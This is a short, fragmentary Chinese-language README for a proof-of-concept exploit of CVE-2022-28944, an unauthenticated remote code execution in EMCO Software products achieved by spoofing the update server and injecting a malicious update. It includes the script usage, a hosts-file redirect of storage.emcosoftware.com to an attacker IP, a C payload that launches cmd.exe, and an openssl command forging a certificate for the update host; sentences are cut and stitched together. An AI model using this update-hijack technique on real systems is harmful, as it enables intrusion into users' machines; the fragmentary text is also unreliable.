
针对 EMCO 软件产品中未经身份验证的远程代码执行的概念验证漏洞利用,通过 DNS 欺骗和恶意更新注入实现。
EMCO Software 多个产品未经身份验证的更新远程代码执行漏洞。
使用方法:python3 cve-2022-28944_poc.py
报告详情请参见 gerr.re。
storage.emcosoftware.com 指向攻击者 IP;
c:\windows\system32\drivers\etc\hosts 以进行概念验证。
proof.c,例如使用 i686-w64-mingw32-gcc proof.c -o proof.exe;#include <windows.h>
int main(int argc, char const *argv[]){
WinExec("cmd.exe",1);
return TRUE;
}
openssl req -new -x509 -keyout storage.emcosoftware.com.pem -out storage.emcosoftware.com.pem -days 365 -nodes -subj "/CN=storage.emcosoftware.com"